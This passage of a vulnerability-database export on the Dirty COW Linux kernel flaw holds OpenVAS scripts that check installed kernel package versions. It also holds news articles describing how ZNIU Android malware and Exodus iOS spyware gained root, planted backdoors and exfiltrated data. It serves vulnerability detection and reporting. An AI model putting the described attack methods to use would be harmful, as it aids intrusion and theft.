versions Versions earlier than C185B384 Versions earlier than C605B370\n\nX6000 versions V100R002C00\n\nX6800 versions V100R003C00\n\neCloud CC versions V100R001C01LSHU01\n\neLog versions V200R003C10 V200R003C20\n\neOMC910 versions V100R003C00\n\neSight versions V300R003C20 V300R005C00SPC200\n\neSight Network versions V300R006C00 V300R007C00\n\neSpace 8950 versions V200R003C00\n\neSpace IPC versions V100R001C21 V200R001C01 V200R001C02\n\neSpace VCN3000 versions V100R001C01 V100R002C00 V100R002C10 V100R002C20\n\ninCloud Eye versions V200R001C21 V200R001C30\n\ninCloud Payment versions V200R001C30\n\ninCloud Shield versions V200R001C30\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", 
value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161207-01-dirtycow-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842926", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842926", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3106-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3106-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842926\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:08 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3106-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. 
A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1032-snapdragon\", ver:\"4.4.0-1032.36\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:57:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120746", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120746", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-757)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it 
and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120746\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:28 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-757)\");\n script_tag(name:\"insight\", value:\"CVE-2016-5195 kernel: mm: privilege escalation via MAP_PRIVATE COW breakageA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. 
An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-757.html\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"perf\", rpm:\"perf~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2016-10-27T00:00:00", "id": "OPENVAS:1361412562310882584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882584", "type": "openvas", "title": "CentOS Update for kernel CESA-2016:2105 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:2105 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 
2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882584\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-27 05:39:59 +0200 (Thu, 27 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:2105 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the\nLinux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory\nmappings. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:2105\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-October/022134.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-07T00:00:00", "id": "OPENVAS:1361412562310871972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871972", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-c8a0c7eece", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-c8a0c7eece\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871972\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:22:15 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-c8a0c7eece\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c8a0c7eece\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWMDLBWMGZKFHMRJ7QUQVCERP5QHDB6W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.3~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:54", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2015-1805"], "description": "[](<https://1.bp.blogspot.com/-7vcEW_qFiVk/WcpSusfMk5I/AAAAAAAAAQE/t7ztmUGPl3wer04_MGfTLJ1Wn30Pu27FgCLcBGAs/s1600/dirtycow-android-malware.png>)\n\nNearly a year after the disclosure of the [Dirty COW vulnerability](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>) that affected the Linux kernel, cybercriminals have started exploiting the vulnerability against Android users, researchers have warned. \n \nPublicly disclosed last year in October, Dirty COW was present in a section of the Linux kernel\u2014a part of virtually every Linux distribution, including Red Hat, Debian, and Ubuntu\u2014for years and was actively exploited in the wild. \n \nThe vulnerability allows an unprivileged local attacker to gain root access through a race condition issue, gain access to read-only root-owned executable files, and permit remote attacks. \n \nHowever, security researchers from Trend Micro published a [blog post](<http://blog.trendmicro.com/trendlabs-security-intelligence/zniu-first-android-malware-exploit-dirty-cow-vulnerability/>) on Monday disclosing that the privilege escalation vulnerability (CVE-2016-5195), known as Dirty COW, has now been actively exploited by a malware sample of ZNIU, detected as AndroidOS_ZNIU. \n \nThis is the first time we have seen a malware sample that contains an exploit for the vulnerability designed to compromise devices running on the mobile platform. 
\n \n\n\n### This Dirty Cow Exploit found in Over 1,200 Android Apps\n\n \nThe malware uses the Dirty COW exploit to root Android devices via the copy-on-write (COW) mechanism in Android's Linux kernel and install a backdoor which can then be used by attackers to collect data and generate profit through a premium rate phone number. \n \nTrend Micro researchers detected the ZNIU malware in more than 1,200 malicious Android apps\u2014some of which disguised themselves as pornography and gaming apps\u2014alongside host websites containing malware rootkits that exploit Dirty Cow. \n \nWhile the Dirty Cow flaw impacts all versions of the Android operating system, ZNIU's Dirty Cow exploit only affects Android devices with ARM/X86 64-bit architecture. However, the recent exploit can be used to bypass SELinux and plant backdoors. \n\n\n> \"We monitored six ZNIU rootkits, four of which were Dirty COW exploits. The other two were KingoRoot, a rooting app, and the Iovyroot exploit (CVE-2015-1805),\" the researchers said. \n\n> \"ZNIU used KingoRoot and Iovyroot because they can root ARM 32-bit CPU devices, which the rootkit for Dirty COW cannot.\"\n\n \n\n\n### Here's How ZNIU's Dirty Cow Exploit Works\n\n \n\n\n[](<https://3.bp.blogspot.com/-edAfrwmUa1o/WcpbZA19nhI/AAAAAAAAC1w/knqWT_NVbTcGjM3FcexOtFvRBbyMKiYoACLcBGAs/s1600/dirty-cow-android-malware.jpg>)\n\nOnce downloaded and installed, the ZNIU malware-carrying app communicates with its command-and-control (C&C) server to check for code updates, while simultaneously the Dirty Cow exploit provides local privilege escalation to gain root access on the device, bypass system restrictions and _\"plant a backdoor for potential remote control attacks in the future.\"_ \n \nThe malware also harvests the carrier information of the user and attempts to send payments via premium SMS messages that were directed to a dummy company in China. 
\n \nOnce the SMS transaction is over, the malware also deletes the messages from the device in order to erase evidence of any compromise. \n \nThe researchers found the malware has already infected more than 5,000 Android users across 40 countries in recent weeks, with the majority of victims found in China and India, while others reside in the United States, Japan, Canada, Germany and Indonesia. \n \nGoogle has released [an update for Android](<https://source.android.com/security/bulletin/2016-12-01>) that, among other fixes, officially fixes the Dirty COW vulnerability. The tech giant also confirmed that its **[Play Protect](<https://thehackernews.com/2017/05/google-play-protect-android.html>)** now protects Android users against this malware. \n \nThe easiest way to prevent yourself from being targeted by such clever malware is to avoid downloading apps from third-party sources and always stick to the official Google Play Store.\n", "modified": "2017-09-26T13:57:30", "published": "2017-09-26T02:52:00", "id": "THN:1F1264BE105BBA74057A5E702B33D71F", "href": "https://thehackernews.com/2017/09/dirty-cow-android-malware.html", "type": "thn", "title": "First Android Malware Found Exploiting Dirty COW Linux Flaw to Gain Root Privileges", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:18:04", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "[](<https://3.bp.blogspot.com/-iDWfxV-PPM8/WAnl79IpuHI/AAAAAAAAp5Y/5lTGfIqtuFYbi_zfNU_ORAiUfLceVljCACLcB/s1600/dirty-cow-linux-kernel-exploit.png>)\n\nA nine-year-old critical vulnerability has been discovered in virtually all versions of the Linux operating system and is actively being exploited in the wild. \n \nDubbed \"**Dirty COW**,\" the Linux kernel security flaw (CVE-2016-5195) is a mere privilege-escalation vulnerability, but researchers are taking it extremely seriously for several reasons. 
\n \nFirst, it's very easy to develop exploits that work reliably. Secondly, the Dirty COW flaw exists in a section of the Linux kernel, which is a part of virtually every distro of the open-source operating system, including RedHat, Debian, and Ubuntu, released for almost a decade. \n \nAnd most importantly, the researchers have discovered attack code that indicates the Dirty COW vulnerability is being actively exploited in the wild. \n \nDirty COW potentially allows any installed malicious app to gain administrative (root-level) access to a device and completely hijack it within just 5 seconds. \n \nEarlier this week, [Linus Torvalds admitted](<https://lkml.org/lkml/2016/10/19/860>) that 11 years ago he first spotted this issue and also tried to fix it, but then he left it unpatched because at the time it was hard to trigger. \n \n\n\n### Why is the Flaw called Dirty COW?\n\n \nThe bug, marked as \"High\" priority, gets its name from the copy-on-write (COW) mechanism in the Linux kernel, which is so broken that any application or malicious program can tamper with read-only root-owned executable files and setuid executables. \n\n\n> \"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings,\" reads the [website](<http://dirtycow.ninja/>) dedicated to Dirty COW. \n\n> \"An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\"\n\nThe Dirty COW vulnerability has been present in the Linux kernel since version 2.6.22 in 2007, and is also believed to be present in Android, which is powered by the Linux kernel. 
\n \n\n\n### Patch Your Linux-powered Systems Immediately\n\n \nAccording to the website, the Linux kernel has been patched, and major vendors such as [RedHat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) and [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>) have already rolled out fixes for their respective Linux distributions. \n \nOrganizations and individuals have been urged to install a patch for their Linux-powered systems, phones and gadgets as soon as possible, or risk falling victim, in order to kill off the Linux kernel-level security flaw affecting nearly every distro of the open-source OS. \n \nThe vulnerability was discovered by security researcher Phil Oester, who found at least one in-the-wild attack exploiting this particular vulnerability. He found the exploit using an HTTP packet capture. \n\n\nThe vulnerability disclosure followed the tradition of branding high-profile security vulnerabilities like [Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>), [Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>), [FREAK](<https://thehackernews.com/2015/03/freak-openssl-vulnerability.html>), and [GHOST](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>). \n \nThe Dirty COW website states: \n\n\n> \"It would have been fantastic to eschew this ridiculousness because we all make fun of branded vulnerabilities too, but this was not the right time to make that stand. 
So we created a website, an online shop, a Twitter account, and used a logo that a professional designer created.\"\n\nYou can find more technical details about the Dirty COW vulnerability and exploit on the bug's official [website](<http://dirtycow.ninja/>), [RedHat](<https://access.redhat.com/security/vulnerabilities/2706661>) site, and [GitHub](<https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails>) page.\n", "modified": "2016-10-25T15:07:13", "published": "2016-10-20T23:02:00", "id": "THN:B571C1AAA8CDDC10150ABA0BF22B19E6", "href": "https://thehackernews.com/2016/10/linux-kernel-exploit.html", "type": "thn", "title": "Dirty COW \u2014 Critical Linux Kernel Flaw Being Exploited in the Wild", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-09T07:54:53", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "[](<https://1.bp.blogspot.com/-FYiOvknu4vY/XKxF4mYpV2I/AAAAAAAAztw/qfugwyFZSvUfDpDrIn4JxRzNFmIunzEjwCLcBGAs/s728-e100/ios-malware-min.jpg>)\n\nCybersecurity researchers have discovered an iOS version of the powerful mobile phone surveillance app that was initially targeting Android devices through apps on the official Google Play Store. \n \nDubbed **Exodus**, the iOS version of the spyware was discovered by security researchers at Lookout during their analysis of the Android samples they had found last year. \n \nUnlike its Android variant, the iOS version of Exodus has been distributed outside of the official App Store, primarily through phishing websites that imitate Italian and Turkmenistani mobile carriers. \n\n\n \nSince Apple restricts direct installation of apps outside of its official app store, the iOS version of Exodus is abusing the Apple Developer Enterprise program, which allows enterprises to distribute their own in-house apps directly to their employees without needing to use the iOS App Store. 
\n \n\n\n> \"Each of the phishing sites contained links to a distribution manifest, which contained metadata such as the application name, version, icon, and a URL for the IPA file,\" the researchers say in a [blog post](<https://blog.lookout.com/esurv-research>). \n \n\"All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L.\"\n\n \nThough the iOS variant is less sophisticated than its Android counterpart, the spyware can still be able to exfiltrate information from targeted iPhone devices including, contacts, audio recordings, photos, videos, GPS location, and device information. \n \nThe stolen data is then transmitted via HTTP PUT requests to an endpoint on the attackers controlled command and control server, which is the same CnC infrastructure as the Android version and uses similar communications protocols. \n\n\n[](<https://1.bp.blogspot.com/-bbiYR-lAE7Y/XKw-4K1NxFI/AAAAAAAAztY/7pLITJjk3Tg_hA18skRD3OG-OLKlQmsOwCLcBGAs/s728-e100/ios-malware-apple-enterprise-developer-program.png>)\n\n \nSeveral technical details indicated that Exodus was \"likely the product of a well-funded development effort\" and aimed to target the government or law-enforcement sectors. \n \n\n\n> \"These included the use of certificate pinning and public key encryption for C2 communications, geo-restrictions imposed by the C2 when delivering the second stage, and the comprehensive and well-implemented suite of surveillance features,\" the researchers say.\n\n \nDeveloped by Italy-based company called Connexxa S.R.L., Exodus came to light late last month when white hat hackers from Security Without Borders [discovered](<https://securitywithoutborders.org/blog/2019/03/29/exodus.html>) nearly 25 different apps disguised as service applications on Google Play Store, which the tech giant removed after being notified. \n \nUnder development for at least five years, Exodus for Android usually consists of three distinct stages. 
